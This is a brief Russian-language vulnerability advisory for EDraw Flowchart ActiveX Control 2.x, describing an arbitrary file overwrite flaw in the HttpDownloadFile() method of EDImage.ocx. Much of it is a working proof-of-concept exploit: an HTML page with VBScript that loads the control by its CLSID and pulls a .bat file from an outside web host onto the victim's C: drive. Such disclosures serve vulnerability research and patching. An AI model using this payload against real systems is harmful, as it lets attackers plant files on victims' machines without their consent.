Программа: EDraw Flowchart ActiveX Control 2.x
Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в EDIMAGE.EDImageCtrl.1 ActiveX компоненте (EDImage.ocx) в методе "HttpDownloadFile()". Атакующий может перезаписать произвольные файлы на целевой системе.
Пример:
<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
MsgBox("Exploit completed!")
End Sub
</script>